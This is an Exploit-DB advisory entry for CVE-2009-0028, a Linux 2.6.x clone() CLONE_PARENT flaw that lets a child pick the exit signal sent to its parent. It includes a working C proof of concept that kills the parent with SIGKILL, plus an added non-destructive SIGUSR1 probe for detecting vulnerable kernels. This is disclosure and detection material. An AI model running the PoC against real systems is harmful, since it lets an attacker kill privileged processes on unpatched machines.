Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness

ID EDB-ID:32815
Type exploitdb
Reporter Chris Evans
Modified 2009-02-25T00:00:00


Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness. CVE-2009-0028. Local exploit for linux platform


The Linux kernel's clone() system call is prone to an origin-validation weakness in the way it delivers a process's exit signal to its parent.

The low byte of the clone() flags selects the signal the kernel sends to the new process's parent when it exits (normally SIGCHLD), and CLONE_PARENT makes the new process a sibling of the caller, i.e. a child of the caller's parent. A process can therefore create a grandchild of its own parent with an arbitrary exit signal; when that grandchild exits, the kernel delivers the chosen signal to the parent on the grandchild's behalf, without the uid checks that a direct kill() from the child would have to pass. This matters when a privileged process runs attacker-supplied code as a child (a setuid program or root daemon spawning a user's program, for example): the attacker can then send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes with SIGKILL, which cannot be caught or ignored, resulting in a denial-of-service condition. Where the parent's handler for some other signal does something exploitable, further attacks may also be possible.

Linux kernel 2.6.28 and earlier are vulnerable. The fix in 2.6.29 makes a CLONE_PARENT child inherit the caller's own exit signal instead of honouring the one requested in the flags, so a grandchild created with CLONE_PARENT | SIGKILL now notifies the parent with plain SIGCHLD.

#define _GNU_SOURCE          /* clone() is a GNU extension in <sched.h> */
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Entry point of the cloned grandchild: it simply exits. That exit is what
 * makes the kernel send the caller-chosen exit signal to the grandchild's
 * parent, which (because of CLONE_PARENT) is the original parent below. */
static int the_child(void* arg) {
  return 0;
}

int main(int argc, const char* argv[]) {
  int ret = fork();
  if (ret < 0)
    abort();
  else if (ret > 0)
    for (;;);          /* parent: stands in for the privileged process and just spins */
  else {
    /* child: stands in for attacker-supplied code. Clone a grandchild whose
     * parent is *our* parent (CLONE_PARENT) and whose exit signal is SIGKILL
     * instead of SIGCHLD. On a vulnerable kernel the parent dies as soon as
     * the grandchild exits. */
    int status;
    char* stack = malloc(4096);
    int flags = SIGKILL | CLONE_PARENT;
    int child = clone(the_child, stack + 4096, flags, NULL);
    /* the grandchild belongs to our parent, not to us, so this returns ECHILD; harmless */
    waitpid(child, &status, __WALL);
  }
  return 0;
}
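The proof of concept above can only tell you a kernel is vulnerable by killing the parent. The following is an added example, not part of the Exploit-DB entry or Chris Evans' code: a non-destructive probe that uses the same clone(CLONE_PARENT | signal) mechanism but asks for SIGUSR1 instead of SIGKILL, keeps SIGUSR1 blocked in the parent, and then inspects sigpending() to see whether the kernel delivered the child-chosen signal. The function and stack-size names, the build line in the comment and the exit codes are this example's own assumptions.

```c
/* clone_parent_probe.c: non-destructive check for the CLONE_PARENT exit-signal
 * behaviour fixed for CVE-2009-0028. Added example, not the original PoC.
 * Assumed build line: gcc -Wall -o clone_parent_probe clone_parent_probe.c */
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define PROBE_STACK (64 * 1024)   /* assumed stack size for the cloned grandchild */

/* The grandchild does nothing: its exit is what triggers the exit signal. */
static int grandchild(void *arg) {
    (void)arg;
    return 0;
}

/* Handler so that unblocking a pending SIGUSR1 at the end cannot kill us. */
static void on_usr1(int sig) { (void)sig; }

/* Returns 1 if the kernel delivered the child-chosen exit signal (SIGUSR1) to
 * this process, i.e. the CVE-2009-0028 behaviour is present; 0 if the parent
 * only received the normal SIGCHLD; -1 if the probe could not be carried out. */
int probe_clone_parent_exit_signal(void) {
    sigset_t block, old, pending;
    struct sigaction sa, old_sa;
    int st, child_status = -1, result;
    pid_t child, pid;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_usr1;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGUSR1, &sa, &old_sa) < 0)
        return -1;

    /* Block SIGUSR1: if the kernel sends it, it stays pending and is visible
     * through sigpending() instead of being handled asynchronously. */
    sigemptyset(&block);
    sigaddset(&block, SIGUSR1);
    if (sigprocmask(SIG_BLOCK, &block, &old) < 0)
        return -1;

    child = fork();
    if (child < 0) {
        result = -1;
        goto out;
    }
    if (child == 0) {
        /* "Attacker" child: the grandchild becomes a child of *our parent*
         * (CLONE_PARENT) and asks that SIGUSR1 be sent to it on exit. */
        char *stack = malloc(PROBE_STACK);
        if (!stack)
            _exit(2);
        if (clone(grandchild, stack + PROBE_STACK, CLONE_PARENT | SIGUSR1, NULL) < 0)
            _exit(2);   /* clone refused (seccomp etc.): report "could not test" */
        _exit(0);
    }

    /* Reap the child and the grandchild; __WALL is required because on a
     * vulnerable kernel the grandchild's exit signal is not SIGCHLD. */
    while ((pid = waitpid(-1, &st, __WALL)) > 0) {
        if (pid == child)
            child_status = WIFEXITED(st) ? WEXITSTATUS(st) : -1;
    }
    if (child_status != 0) {
        result = -1;
        goto out;
    }

    sigemptyset(&pending);
    if (sigpending(&pending) < 0) {
        result = -1;
        goto out;
    }
    result = sigismember(&pending, SIGUSR1) ? 1 : 0;

out:
    /* Restoring the mask delivers any pending SIGUSR1 to on_usr1(), harmlessly. */
    sigprocmask(SIG_SETMASK, &old, NULL);
    sigaction(SIGUSR1, &old_sa, NULL);
    return result;
}

int main(void) {
    int r = probe_clone_parent_exit_signal();
    if (r < 0) {
        perror("probe could not run");
        return 2;
    }
    printf("child-chosen exit signal reached the parent: %s\n",
           r ? "YES (2.6.28-style behaviour, CVE-2009-0028)" : "no (fixed kernel)");
    return r;
}
```

The probe keeps SIGUSR1 blocked for the whole experiment so the result does not depend on signal timing, and it reaps both processes before looking at the pending set, so the grandchild's exit has certainly been processed. A fixed kernel gives the grandchild the caller's SIGCHLD and the probe returns 0; an unpatched 2.6.28 kernel leaves SIGUSR1 pending and it returns 1.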